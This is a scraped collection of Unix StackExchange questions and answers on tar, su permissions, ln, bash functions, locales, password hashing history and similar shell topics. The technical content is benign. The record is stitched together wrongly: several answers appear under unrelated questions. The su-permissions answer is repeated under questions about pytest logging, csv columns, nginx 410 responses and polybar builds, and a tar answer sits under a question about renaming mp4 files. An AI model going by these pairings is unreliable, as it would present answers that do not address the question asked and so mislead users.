0 directories, 1 file With --strip-components=3 3 elements a/b/c have not been recreated
and we got FILE in the same level directory in which we run tar : $ rm -r c
$ tar xf archive.tar --strip-components=3
$ ls -Al
total 12
-rw-r--r-- 1 ja users 0 Mar 26 15:39 FILE
-rw-r--r-- 1 ja users 10240 Mar 26 15:41 archive.tar -C option tells tar to change to a given directory before running a
requested operation, extracting but also archiving. In this
comment you asked: Asking tar to do cd: why cd? I mean to ask, why it's not just mv? Why do you think that mv is better? To what directory would you like
to extract tar archive first: /tmp - what if it's missing or full? "$TMPDIR" - what if it's unset, missing or full? current directory - what if user has no w permission, just r and x ? what if a temporary directory, whatever it is already contained
files with the same names as in tar archive and extracting would
overwrite them? what if a temporary directory, whatever it is didn't support Unix
filesystems and all info about ownership, executable bits etc. would
be lost? Also notice that -C is a common change directory option in other
programs as well, Git and make are first that come to my
mind. | {
"source": [
"https://unix.stackexchange.com/questions/535772",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/-1/"
]
} |
535,777 | I have a folder called movies on my Ubuntu, which contains many subfolders. Each subfolder contains 1 mp4 file and may contain other files (jpg, srt). Each subfolder has the same title format: My Subfolder 1 (2001) Bla Bla
My Subfolder 2 (2000) Bla
My Subfolder 3 (1999) How can I rename the mp4 files same as parent folder but without the year and the blabla? For example, the mp4s inside the subfolders above become : My Subfolder 1.mp4
My Subfolder 2.mp4
My Subfolder 3.mp4 I want the mp4s to stay in their subfolder, just their name will be changed. The year is always in parentheses. | The fragment of manpage you included in your question comes from man
for GNU tar. GNU is a software project that prefers info manuals
over manpages. In fact, tar manpage has been added to the GNU tar
source code tree only in
2014 and it still is just a reference, not a full-blown manual with
examples. You can invoke a full info manual with info tar , it's
also available online here . It contains
several examples of --strip-components usage, the relevant fragments
are: --strip-components=number Strip given number of leading components from file names before extraction. For example, if archive `archive.tar' contained `some/file/name', then running tar --extract --file archive.tar --strip-components=2 would extract this file to file `name'. and: --strip-components=number Strip given number of leading components from file names before extraction. For example, suppose you have archived whole `/usr' hierarchy to a tar archive named `usr.tar'. Among other files, this archive contains `usr/include/stdlib.h', which you wish to extract to the current working directory. To do so, you type: $ tar -xf usr.tar --strip=2 usr/include/stdlib.h The option `--strip=2' instructs tar to strip the two leading components (`usr/' and `include/') off the file name. That said; There are other implementations of tar out there, for example FreeBSD
tar manpage has a
different explanation of this command: --strip-components count Remove the specified number of leading path elements. Pathnames
with fewer elements will be silently skipped. Note that the
pathname is edited after checking inclusion/exclusion patterns
but before security checks. In other words, you should understand a Unix path as a sequence of
elements separated by / (unless there is only one / ). Here is my own example (other examples are available in the info manual I linked to above): Let's create a new directory structure: mkdir -p a/b/c Path a/b/c is composed of 3 elements: a , b , and c . Create an empty file in this directory and put it into .tar archive: $ touch a/b/c/FILE
$ tar -cf archive.tar a/b/c/FILE FILE is a 4th element of a/b/c/FILE path. List contents of archive.tar: $ tar tf archive.tar
a/b/c/FILE You can now extract archive.tar with --strip-components and an
argument that will tell it how many path elements you want to be removed from the a/b/c/FILE when extracted. Remove an original a directory: rm -r a Extract with --strip-components=1 - only a has not been recreated: $ tar xf archive.tar --strip-components=1
$ ls -Al
total 16
-rw-r--r-- 1 ja users 10240 Mar 26 15:41 archive.tar
drwxr-xr-x 3 ja users 4096 Mar 26 15:43 b
$ tree b
b
└── c
└── FILE
1 directory, 1 file With --strip-components=2 you see that a/b - 2 elements have not
been recreated: $ rm -r b
$ tar xf archive.tar --strip-components=2
$ ls -Al
total 16
-rw-r--r-- 1 ja users 10240 Mar 26 15:41 archive.tar
drwxr-xr-x 2 ja users 4096 Mar 26 15:46 c
$ tree c
c
└── FILE
0 directories, 1 file With --strip-components=3 3 elements a/b/c have not been recreated
and we got FILE in the same level directory in which we run tar : $ rm -r c
$ tar xf archive.tar --strip-components=3
$ ls -Al
total 12
-rw-r--r-- 1 ja users 0 Mar 26 15:39 FILE
-rw-r--r-- 1 ja users 10240 Mar 26 15:41 archive.tar -C option tells tar to change to a given directory before running a
requested operation, extracting but also archiving. In this
comment you asked: Asking tar to do cd: why cd? I mean to ask, why it's not just mv? Why do you think that mv is better? To what directory would you like
to extract tar archive first: /tmp - what if it's missing or full? "$TMPDIR" - what if it's unset, missing or full? current directory - what if user has no w permission, just r and x ? what if a temporary directory, whatever it is already contained
files with the same names as in tar archive and extracting would
overwrite them? what if a temporary directory, whatever it is didn't support Unix
filesystems and all info about ownership, executable bits etc. would
be lost? Also notice that -C is a common change directory option in other
programs as well, Git and make are first that come to my
mind. | {
"source": [
"https://unix.stackexchange.com/questions/535777",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/367197/"
]
} |
535,936 | I have a headless server that is logged into remotely by multiple users. None of the other users are in the sudoers file, so they cannot obtain root via sudo . However, since the permissions on su are -rwsr-xr-x there's nothing stopping them from attempting to brute force the root password. One could argue that if a user knows the root password they can compromise the system anyway, but I don't think this is the case. OpenSSH is configured with PermitRootLogin no and PasswordAuthentication no , and none of the other users have physical access to the server. As far as I can tell, the world execute permission on /usr/bin/su is the only avenue for users attempting to gain root on my server. What's further puzzling to me in that it doesn't even seem useful. It allows me to run su directly instead of needing to do sudo su , but this is hardly an inconvenience. Am I overlooking something? Is the world execute permission on su just there for historic reasons? Are there any downsides to removing that permission that I haven't encountered yet? | One point that is missing from ilkkachu's answer is that elevating to root is only one specific use for su . The general purpose of su is to open a new shell under another user's login account. That other user could be root (and perhaps most often is), but su can be used to assume any identity the local system can authenticate. For example, if I'm logged in as user jim , and I want to investigate a problem that mike has reported, but which I am unable to reproduce, I might try logging in as mike , and running the command that is giving him trouble. 13:27:20 /home/jim> su -l mike
Password:(I type mike's password (or have him type it) and press Enter)
13:27:22 /home/mike> id
uid=1004(mike) gid=1004(mike) groups=1004(mike)
13:27:25 /home/mike> exit # this leaves mike's login shell and returns to jim's
13:27:29 /home/jim> id
uid=1001(jim) gid=1001(jim) groups=1001(jim),0(wheel),5(operator),14(ftp),920(vboxusers) Using the -l option of su causes it to simulate a full login (per the man page). The above requires knowledge of mike 's password, however. If I have sudo access, I can log in as mike even without his password. 13:27:37 /home/jim> sudo su -l mike
Password:(I type my own password, because this is sudo asking)
13:27:41 /home/mike> In summary, the reason the permissions on the su executable are as you show, is because su is a general-purpose tool that is available to all users on the system. | {
"source": [
"https://unix.stackexchange.com/questions/535936",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/100178/"
]
} |
535,939 | How can I output the command itself in addition to its output to a file? I know that I can do how to output text to both screen and file inside a shell script? to capture the output. My use case is specific to pytest. pytest /awesome_tests -k test_quick_tests -n auto &> test_output_$(date -u +"%FT%H%MZ").txt It would be really helpful to have the command executed in the output so I knew specifically what the results were for. | One point that is missing from ilkkachu's answer is that elevating to root is only one specific use for su . The general purpose of su is to open a new shell under another user's login account. That other user could be root (and perhaps most often is), but su can be used to assume any identity the local system can authenticate. For example, if I'm logged in as user jim , and I want to investigate a problem that mike has reported, but which I am unable to reproduce, I might try logging in as mike , and running the command that is giving him trouble. 13:27:20 /home/jim> su -l mike
Password:(I type mike's password (or have him type it) and press Enter)
13:27:22 /home/mike> id
uid=1004(mike) gid=1004(mike) groups=1004(mike)
13:27:25 /home/mike> exit # this leaves mike's login shell and returns to jim's
13:27:29 /home/jim> id
uid=1001(jim) gid=1001(jim) groups=1001(jim),0(wheel),5(operator),14(ftp),920(vboxusers) Using the -l option of su causes it to simulate a full login (per the man page). The above requires knowledge of mike 's password, however. If I have sudo access, I can log in as mike even without his password. 13:27:37 /home/jim> sudo su -l mike
Password:(I type my own password, because this is sudo asking)
13:27:41 /home/mike> In summary, the reason the permissions on the su executable are as you show, is because su is a general-purpose tool that is available to all users on the system. | {
"source": [
"https://unix.stackexchange.com/questions/535939",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/24192/"
]
} |
535,941 | I have a csv file: test_1,2,data,hi,cat
test_2,3,4,5,6
test_1,3,7,8,9 I want to delete column 3 of the rows which begin with test_1 . I used the cut command to delete column 3 but I do not know how to do it only for a row that begins with test_1 . | One point that is missing from ilkkachu's answer is that elevating to root is only one specific use for su . The general purpose of su is to open a new shell under another user's login account. That other user could be root (and perhaps most often is), but su can be used to assume any identity the local system can authenticate. For example, if I'm logged in as user jim , and I want to investigate a problem that mike has reported, but which I am unable to reproduce, I might try logging in as mike , and running the command that is giving him trouble. 13:27:20 /home/jim> su -l mike
Password:(I type mike's password (or have him type it) and press Enter)
13:27:22 /home/mike> id
uid=1004(mike) gid=1004(mike) groups=1004(mike)
13:27:25 /home/mike> exit # this leaves mike's login shell and returns to jim's
13:27:29 /home/jim> id
uid=1001(jim) gid=1001(jim) groups=1001(jim),0(wheel),5(operator),14(ftp),920(vboxusers) Using the -l option of su causes it to simulate a full login (per the man page). The above requires knowledge of mike 's password, however. If I have sudo access, I can log in as mike even without his password. 13:27:37 /home/jim> sudo su -l mike
Password:(I type my own password, because this is sudo asking)
13:27:41 /home/mike> In summary, the reason the permissions on the su executable are as you show, is because su is a general-purpose tool that is available to all users on the system. | {
"source": [
"https://unix.stackexchange.com/questions/535941",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/367383/"
]
} |
535,947 | I'm trying to configure nginx to return a http 410 ("Resource Gone") code for any path under / My config is below. With this config, if I request /410test, I get a standard nginx 404 Not Found page, and a response status code of 404. So I'm having trouble even getting a response of 410 for one specific path, much less, all paths. user www-data;
worker_processes auto;
pid /run/nginx.pid;
include /etc/nginx/modules-enabled/*.conf;
events {
worker_connections 768;
# multi_accept on;
}
http {
server {
location /410test {
return 410 "this is my 410 test page";
}
}
sendfile on;
tcp_nopush on;
tcp_nodelay on;
keepalive_timeout 65;
types_hash_max_size 2048;
include /etc/nginx/mime.types;
default_type application/octet-stream;
ssl_protocols TLSv1 TLSv1.1 TLSv1.2; # Dropping SSLv3, ref: POODLE
ssl_prefer_server_ciphers on;
access_log /var/log/nginx/access.log;
error_log /var/log/nginx/error.log;
gzip on;
include /etc/nginx/conf.d/*.conf;
include /etc/nginx/sites-enabled/*;
} | One point that is missing from ilkkachu's answer is that elevating to root is only one specific use for su . The general purpose of su is to open a new shell under another user's login account. That other user could be root (and perhaps most often is), but su can be used to assume any identity the local system can authenticate. For example, if I'm logged in as user jim , and I want to investigate a problem that mike has reported, but which I am unable to reproduce, I might try logging in as mike , and running the command that is giving him trouble. 13:27:20 /home/jim> su -l mike
Password:(I type mike's password (or have him type it) and press Enter)
13:27:22 /home/mike> id
uid=1004(mike) gid=1004(mike) groups=1004(mike)
13:27:25 /home/mike> exit # this leaves mike's login shell and returns to jim's
13:27:29 /home/jim> id
uid=1001(jim) gid=1001(jim) groups=1001(jim),0(wheel),5(operator),14(ftp),920(vboxusers) Using the -l option of su causes it to simulate a full login (per the man page). The above requires knowledge of mike 's password, however. If I have sudo access, I can log in as mike even without his password. 13:27:37 /home/jim> sudo su -l mike
Password:(I type my own password, because this is sudo asking)
13:27:41 /home/mike> In summary, the reason the permissions on the su executable are as you show, is because su is a general-purpose tool that is available to all users on the system. | {
"source": [
"https://unix.stackexchange.com/questions/535947",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/367391/"
]
} |
535,961 | I'm trying to compile polybar , and I get a long compilation error which is related to xcb (apparently), I have the log file here ; I've read through the polybar wiki and I came upon the solution of downgrading xcb-proto to 1.11 , and so I followed through with the process, although I'm not really sure how to check ther version (the logs tell me that each X-extension has version 1.13 though?) Nonetheless I've tried compiling with both Clang and GCC using build.sh , all to no avail, my question is how I can downgrade packages: -- [X] xcb-randr (1.13.1)
-- [X] xcb-randr (monitor support) (1.13.1)
-- [X] xcb-composite (1.13.1)
-- [X] xcb-xkb (1.13.1)
[...] to version 1.11? EDIT I have tried to remove the libxcb* packages from my Debian, and before I wrote yes on the prompt to continue I noticed it would make redundant a lot of packages that would otherwise be beneficial to my system, so I don't see how I can hotplug a downgrade without removing the packages I want to downgrade to begin with. | One point that is missing from ilkkachu's answer is that elevating to root is only one specific use for su . The general purpose of su is to open a new shell under another user's login account. That other user could be root (and perhaps most often is), but su can be used to assume any identity the local system can authenticate. For example, if I'm logged in as user jim , and I want to investigate a problem that mike has reported, but which I am unable to reproduce, I might try logging in as mike , and running the command that is giving him trouble. 13:27:20 /home/jim> su -l mike
Password:(I type mike's password (or have him type it) and press Enter)
13:27:22 /home/mike> id
uid=1004(mike) gid=1004(mike) groups=1004(mike)
13:27:25 /home/mike> exit # this leaves mike's login shell and returns to jim's
13:27:29 /home/jim> id
uid=1001(jim) gid=1001(jim) groups=1001(jim),0(wheel),5(operator),14(ftp),920(vboxusers) Using the -l option of su causes it to simulate a full login (per the man page). The above requires knowledge of mike 's password, however. If I have sudo access, I can log in as mike even without his password. 13:27:37 /home/jim> sudo su -l mike
Password:(I type my own password, because this is sudo asking)
13:27:41 /home/mike> In summary, the reason the permissions on the su executable are as you show, is because su is a general-purpose tool that is available to all users on the system. | {
"source": [
"https://unix.stackexchange.com/questions/535961",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/367221/"
]
} |
537,319 | I want to download files from my office computer to my laptop. I can connect my office machine by SSH to the organization server and then SSH from the server to my office machine. The only commands the organization server accepts are ssh, ssh1, and ssh2. How can I download a file from my office (remote) machine through the server into my laptop (local) machine? | The previous answers mention how to use the ProxyJump directive (added in OpenSSH 7.3) to connect through an intermediate server (usually referred to as the bastion host), but mention it just as a command line argument. Unless it is a machine you won't be connecting in the future, the best thing is that you configure it on ~/.ssh/config . I would put a file like: Host office-machine
Hostname yochay-machine.internal.company.local
ProxyJump bastion-machine
Host bastion-machine
Hostname organization-server.company.com
... If you are using an earlier version of OpenSSH which doesn't support ProxyJump, you would replace it with the equivalent: ProxyCommand ssh -W %h:%p bastion-machine and if your local ssh version was a really ancient one that didn't support -W : ssh bastion-machine nc %h %p although this last one requires that the bastion machine has nc installed. The beauty of ssh is that you can configure each destination on the file, and they will stack very nicely. Thus you end up working with office-machine as the hostname on all the tools (ssh, scp, sftp...) as they were direct connects, and they will figure out how to connect based in the ssh_config. You could also have wildcards like Host *.internal.company.local to make all hosts ending like that going through a specific bastion, and it will apply to all of them. Once configured correctly, the only difference between doing one hop connections or twenty would be the slower connection times. | {
"source": [
"https://unix.stackexchange.com/questions/537319",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/318266/"
]
} |
537,413 | Sorry if this has an answer elsewhere, I've no idea how to search for my problem. I was running some simulations on a redhat linux HPC server, and my code for handling the folder structure to save the output had an unfortunate bug. My matlab code to create the folder was: folder = [sp.saveLocation, 'run_', sp.run_number, '/']; where sp.run_number was an integer. I forgot to convert it to a string, but for some reason running mkdir(folder); (in matlab) still succeeded. In fact, the simulations ran without a hitch, and the data got saved to the matching directory. Now, when the folder structure is queried/printed I get the following situations: When I try to tab autocomplete: run_ run_^A/ run_^B/ run_^C/ run_^D/ run_^E/ run_^F/ run_^G/ run_^H/ run_^I/ When I use ls : run_ run_? run_? run_? run_? run_? run_? run_? run_? run_? run_? . When I transfer to my mac using rsync the --progress option shows: run_\#003/ etc. with (I assume) the number matching the integer in sp.run_number padded to three digits, so the 10th run is run_\#010/ When I view the folders in finder I see run_ run_ run_ run_ run_ run_ run_ run_ run_ run_? Looking at this question and using the command ls | LC_ALL=C sed -n l I get: run_$
run_\001$
run_\002$
run_\003$
run_\004$
run_\005$
run_\006$
run_\a$
run_\b$
run_\t$
run_$ I can't manage to cd into the folders using any of these representations. I have thousands of these folders, so I'll need to fix this with a script.
Which of these options is the correct representation of the folder? How can I programmatically refer to these folders so I rename them with a properly formatted name using a bash script? And I guess for the sake of curiosity, how in the hell did this happen in the first place? | You can use the perl rename utility (aka prename or file-rename ) to rename the directories. NOTE: This is not to be confused with rename from util-linux , or any other version. rename -n 's/([[:cntrl:]])/ord($1)/eg' run_*/ This uses perl's ord() function to replace each control-character in the filename with the ordinal number for that character. e.g ^A becomes 1, ^B becomes 2, etc. The -n option is for a dry-run to show what rename would do if you let it. Remove it (or replace it with -v for verbose output) to actually rename. The e modifier in the s/LHS/RHS/eg operation causes perl to execute the RHS (the replacement) as perl code, and the $1 is the matched data (the control character) from the LHS. If you want zero-padded numbers in the filenames, you could combine ord() with sprintf() . e.g. $ rename -n 's/([[:cntrl:]])/sprintf("%02i",ord($1))/eg' run_*/ | sed -n l
rename(run_\001, run_01)$
rename(run_\002, run_02)$
rename(run_\003, run_03)$
rename(run_\004, run_04)$
rename(run_\005, run_05)$
rename(run_\006, run_06)$
rename(run_\a, run_07)$
rename(run_\b, run_08)$
rename(run_\t, run_09)$ The above examples work if and only if sp.run_number in your matlab script was in the range of 0..26 (so it produced control-characters in the directory names). To deal with ANY 1-byte character (i.e. from 0..255), you'd use: rename -n 's/run_(.)/sprintf("run_%03i",ord($1))/e' run_*/ If sp.run_number could be > 255, you'd have to use perl's unpack() function instead of ord() . I don't know exactly how matlab outputs an unconverted int in a string, so you'll have to experiment. See perldoc -f unpack for details. e.g. the following will unpack both 8-bit and 16-bit unsigned values and zero-pad them to 5 digits wide: rename -n 's/run_(.*)/sprintf("run_%05i",unpack("SC",$1))/e' run_*/ | {
"source": [
"https://unix.stackexchange.com/questions/537413",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/128396/"
]
} |
537,707 | I have a text file on Linux where the contents are like below: help.helloworld.com:latest.world.com
dev.helloworld.com:latest.world.com I want to get the contents before the colon like below: help.helloworld.com
dev.helloworld.com How can I do that within the terminal? | This is what cut is for: $ cat file
help.helloworld.com:latest.world.com
dev.helloworld.com:latest.world.com
foo:baz:bar
foo
$ cut -d: -f1 file
help.helloworld.com
dev.helloworld.com
foo
foo You just set the delimiter to : with -d: and tell it to only print the 1st field ( -f1 ). | {
"source": [
"https://unix.stackexchange.com/questions/537707",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/368488/"
]
} |
538,397 | I want a way to run a command randomly, say 1 out of 10 times. Is there a builtin or GNU coreutil to do this, ideally something like: chance 10 && do_stuff where do_stuff is only executed 1 in 10 times? I know I could write a script, but it seems like a fairly simple thing and I was wondering if there is a defined way. | In ksh , Bash, Zsh, Yash or BusyBox sh : [ "$RANDOM" -lt 3277 ] && do_stuff The RANDOM special variable of the Korn, Bash, Yash, Z and BusyBox shells produces a pseudo-random decimal integer value between 0 and 32767 every time it’s evaluated, so the above gives (close to) a one-in-ten chance. You can use this to produce a function which behaves as described in your question, at least in Bash: function chance {
[[ -z $1 || $1 -le 0 ]] && return 1
[[ $RANDOM -lt $((32767 / $1 + 1)) ]]
} Forgetting to provide an argument, or providing an invalid argument, will produce a result of 1, so chance && do_stuff will never do_stuff . This uses the general formula for “1 in n ” using $RANDOM , which is [[ $RANDOM -lt $((32767 / n + 1)) ]] , giving a (⎣32767 / n ⎦ + 1) in 32768 chance. Values of n which aren’t factors of 32768 introduce a bias because of the uneven split in the range of possible values. | {
"source": [
"https://unix.stackexchange.com/questions/538397",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/226063/"
]
} |
538,409 | I have installed kali linux through linux deploy on my android phone. When I try to ssh into the kali linux it asks for password. If I give the password which was entered before installing kali linux then it says "Password incorrect". I can VNC through that password but can't connect to ssh and also can't get root access. When I type sudo it says sudo: PERM ROOT: setresuid(0,-1,-1): Permission denied
sudo: unable to initialize policy plugin. And also I can’t install any packages through apt-get install . I am new to linux kindly help!!! | In ksh , Bash, Zsh, Yash or BusyBox sh : [ "$RANDOM" -lt 3277 ] && do_stuff The RANDOM special variable of the Korn, Bash, Yash, Z and BusyBox shells produces a pseudo-random decimal integer value between 0 and 32767 every time it’s evaluated, so the above gives (close to) a one-in-ten chance. You can use this to produce a function which behaves as described in your question, at least in Bash: function chance {
[[ -z $1 || $1 -le 0 ]] && return 1
[[ $RANDOM -lt $((32767 / $1 + 1)) ]]
} Forgetting to provide an argument, or providing an invalid argument, will produce a result of 1, so chance && do_stuff will never do_stuff . This uses the general formula for “1 in n ” using $RANDOM , which is [[ $RANDOM -lt $((32767 / n + 1)) ]] , giving a (⎣32767 / n ⎦ + 1) in 32768 chance. Values of n which aren’t factors of 32768 introduce a bias because of the uneven split in the range of possible values. | {
"source": [
"https://unix.stackexchange.com/questions/538409",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/369517/"
]
} |
538,844 | From C, what's the easiest way to run a standard utility (e.g., ps) and no other? Does POSIX guarantee that, for example, a standard ps is in /bin/ps or should I reset the PATH environment variable to what I get with confstr(_CS_PATH, pathbuf, n); and then run the utility through PATH-search? | No, it doesn't, mainly for the reason that it doesn't require systems to conform by default , or to comply to only the POSIX standard (to the exclusion of any other standard). For instance, Solaris (a certified compliant system) chose backward compatibility for its utilities in /bin , which explains why those behave in arcane ways, and provide POSIX-compliant utilities in separate locations ( /usr/xpg4/bin , /usr/xpg6/bin ... for different versions of the XPG (now merged into POSIX) standard, those being actually part of optional components in Solaris). Even sh is not guaranteed to be in /bin . On Solaris, /bin/sh used to be the Bourne shell (so not POSIX compliant) until Solaris 10, while it's now ksh93 in Solaris 11 (still not fully POSIX compliant, but in practice more so than /usr/xpg4/bin/sh ). From C, you could use exec*p() and assume you're in a POSIX environment (in particular regarding the PATH environment variable). You could also set the PATH environment variable #define _POSIX_C_SOURCE=200809L /* before any #include */
...
confstr(_CS_PATH, buf, sizeof(buf)); /* maybe append the original
* PATH if need be */
setenv("PATH", buf, 1);
exec*p("ps"...); Or you could determine at build time the path of the POSIX utilities you want to run (bearing in mind that on some systems like GNU ones, you need more steps like setting a POSIXLY_CORRECT variable to ensure compliance). You could also try things like: execlp("sh", "sh", "-c", "PATH=`getconf PATH`${PATH+:$PATH};export PATH;"
"unset IFS;shift \"$1\";"
"exec ${1+\"$@\"}", "2", "1", "ps", "-A"...); In the hope that there's a sh in $PATH , that it is Bourne-like, that there's also a getconf and that it's the one for the version of POSIX you're interested in. | {
"source": [
"https://unix.stackexchange.com/questions/538844",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/23692/"
]
} |
539,823 | I did a few research, I can split the string by '.' but the only thing I want to replace is the third '.', and the version number is actually variable so how can I do the replace/split? version: 1.8.0.110 but What I want is the output like this: version: 1.8.0-110 | Used sed for example: $ echo 'version: 1.8.0.110' | sed 's/\./-/3'
version: 1.8.0-110 Explanation: sed s/search/replace/x searches for a string and replaces it with another string. x determines which occurence to replace - here the 3rd. Often g is used for x to mean all occurances. Here we wish to replace the dot . but this is a special character in the regular expression sed expects in the search term. Therefore we backslashify the . to \. to specify a literal . . Since we use special characters in the argument to sed (here, the backslash \ ) we need to put the whole argument in single quotes '' . Many people always use quotes here so as not to run into problems when using characters that might be special to the shell (like space ). | {
"source": [
"https://unix.stackexchange.com/questions/539823",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/370424/"
]
} |
541,342 | Say I have a POSIX shell script that needs to run on different systems/environments that I do not control, and needs to remove the decimal separator from a string that is emitted by a program that respects the locale settings. How can I detect the decimal separator in the most general way? | Ask locale : locale decimal_point This will output the decimal point using the current locale settings. If you need the thousands separator: locale thousands_sep You can view all the numeric keywords by requesting the LC_NUMERIC category : locale -k LC_NUMERIC | {
"source": [
"https://unix.stackexchange.com/questions/541342",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/164535/"
]
} |
541,779 | There's no directory above / , so what's the point of the .. in it? | The .. entry in the root directory is a special case. From the POSIX standard ( 4.13 Pathname Resolution , where the . and .. entries are referred to as "dot" and "dot-dot" repsectively): The special filename dot shall refer to the directory specified by its predecessor. The special filename dot-dot shall refer to the parent directory of its predecessor directory. As a special case, in the root directory, dot-dot may refer to the root directory itself. The rationale has this to add ( A.4.13 Pathname Resolution ) What the filename dot-dot refers to relative to the root directory is implementation-defined. In Version 7 it refers to the root directory itself; this is the behavior mentioned in POSIX.1-2017. In some networked systems the construction /../hostname/ is used to refer to the root directory of another host, and POSIX.1 permits this behavior. Other networked systems use the construct //hostname for the same purpose; that is, a double initial <slash> is used. [...] So, in short, the POSIX standard says that every directory should have both . and .. entries, and permits the .. directory entry in / to refer to the / directory itself (notice the word "may" in the first text quoted), but it also allows an implementation to let it refer to something else. Most common implementations of filesystems makes /.. resolve to / . | {
"source": [
"https://unix.stackexchange.com/questions/541779",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/85900/"
]
} |
541,795 | I have used ln to write symbolic links for years but I still get the order of parameters the wrong away around. This usually has me writing: ln -s a b and then looking at the output to remind myself. I always imagine to be a -> b as I read it when it's actually the opposite b -> a . This feels counter-intuitive so I find that I'm always second-guessing myself. Does anyone have any tips to help me remember the correct order? | I use the following: ln has a one-argument form (2nd form listed in the manpage ) in which only the target is required (because how could ln work at all without knowing the target) and ln creates the link in the current directory. The two-argument form is an addition to the one-argument form, thus the target is always the first argument. | {
"source": [
"https://unix.stackexchange.com/questions/541795",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/81989/"
]
} |
542,989 | When did Unix move away from storing clear text passwords in passwd? Also, when was the shadow file introduced? | For the early history of Unix password storage, read Robert Morris and Ken Thompson's Password Security: A Case History . They explain why and how early Unix systems acquired most the features that are still seen today as the important features of password storage (but done better). The first Unix systems stored passwords in plaintext. Unix Third Edition introduced the crypt function which hashes the password. It's described as “encryption” rather than “hashing” because modern cryptographic terminology wasn't established yet and it used an encryption algorithm, albeit in an unconventional way. Rather than encrypt the password with a key, which would be trivial to undo when you have the key (which would have to be stored on the system), they use the password as the key. When Unix switched from an earlier cipher to the then-modern DES , it was also made slower by iterating DES multiple times. I don't know exactly when that happened: V6? V7? Merely hashing the password is vulnerable to multi-target attacks: hash all the most common passwords once and for all, and look in the password table for a match. Including a salt in the hashing mechanism, where each account has a unique salt, defeats this precomputation. Unix acquired a salt in Seventh Edition in 1979 . Unix also acquired password complexity rules such as a minimum length in the 1970s. Originally the password hash was in the publicly-readable file /etc/passwd . Putting the hash in a separate file /etc/shadow that only the system (and the system administrator) could access was one of the many innovations to come from Sun, dating from around SunOS 4 in the mid-1980s. It spread out gradually to other Unix variants (partly via the third party shadow suite whose descendent is still used on Linux today) and wasn't available everywhere until the mid-1990s or so. Over the years, there have been improvements to the hashing algorithm. The biggest jump was Poul-Henning Kamp's MD5-based algorithm in 1994, which replaced the DES-based algorithm by one with a better design. It removed the limitation to 8 password characters and 2 salt characters and had increased slowness. See IEEE's Developing with open source software , Jan–Feb. 2004, p. 7–8 . The SHA-2-based algorithms that are the de facto standard today are based on the same principle, but with slightly better internal design and, most importantly, a configurable slowness factor. | {
"source": [
"https://unix.stackexchange.com/questions/542989",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/373706/"
]
} |
543,013 | For example, there's https://aur.archlinux.org/packages/github-desktop/ , https://aur.archlinux.org/packages/github-desktop-bin/ , and https://aur.archlinux.org/packages/github-desktop-git/ . I took a look at the pkgbuilds and found no easily identifiable difference between the packages. This isn't just one package, but many of them. What's the difference between them? Which one should I install? | Normal packages are built from stable versions or stable git tags of a repository. The program is compiled in user's machine and then installed. This will take time. Packages with -bin suffix are already built by upstream maintainer and is available somewhere. So, users do not have to compile the package in their machine. The PKGBUILD script downloads, extracts and install the files. Some proprietary software are released in this format where source code is not available. Packages with -git suffix are built from the latest commit from git repository, no matter it is a stable or not. This way user get latest fix or patches. This also compiled in user machine, then installed. The difference among the AUR packages can be easily understood from their corresponding PKGBUILD file (shell script like) in source() function. Here is an example: For github-desktop the source is a stable git release tag: pkgver=x.y.z
_pkgver="${pkgver}-linux1"
gitname="release-${_pkgver}"
https://github.com/shiftkey/desktop.git#tag=${gitname} For github-desktop-bin the source is a already packed Debian package: pkgver=x.y.z
_pkgver="${pkgver}-linux1"
gitname="release-${_pkgver}"
https://github.com/shiftkey/desktop/releases/download/${gitname}/GitHubDesktop-linux-${_pkgver}.deb For github-desktop-git the source is latest master branch: https://github.com/shiftkey/desktop.git Further readings: Arch Wiki: Arch User Repository (AUR) Manjaro Forum: The difference between bin and non bin packages | {
"source": [
"https://unix.stackexchange.com/questions/543013",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/321803/"
]
} |
543,792 | In the bash shell, we can define a function f with f(){ echo Hello; } and then redeclare/override it, without any error or warning messages, with f(){ echo Bye; } I believe there is a way to protect functions from being overridden in this way. | You may declare a function foo as a read-only function using readonly -f foo or declare -g -r -f foo ( readonly is equivalent to declare -g -r ). It's the -f option to these built-in utilities that makes them act on foo as the name of a function, rather than on the variable foo . $ foo () { echo Hello; }
$ readonly -f foo
$ foo () { echo Bye; }
bash: foo: readonly function
$ unset -f foo
bash: unset: foo: cannot unset: readonly function
$ foo
Hello As you can see, making the function read-only not only protects it from getting overridden, but also protects it from being unset (removed completely). Currently (as of bash-5.0.11 ), trying to modify a read-only function would not terminate the shell if one is using the errexit shell option ( set -e ). Chet, the bash maintainer, says that this is an oversight and that it will be changed with the next release. Update: This was fixed during October 2019 for bash-5.1-alpha , so any bash release 5.1 or later would exit properly if an attempt to modify a read-only function is made while the errexit shell option is active. | {
"source": [
"https://unix.stackexchange.com/questions/543792",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/156608/"
]
} |
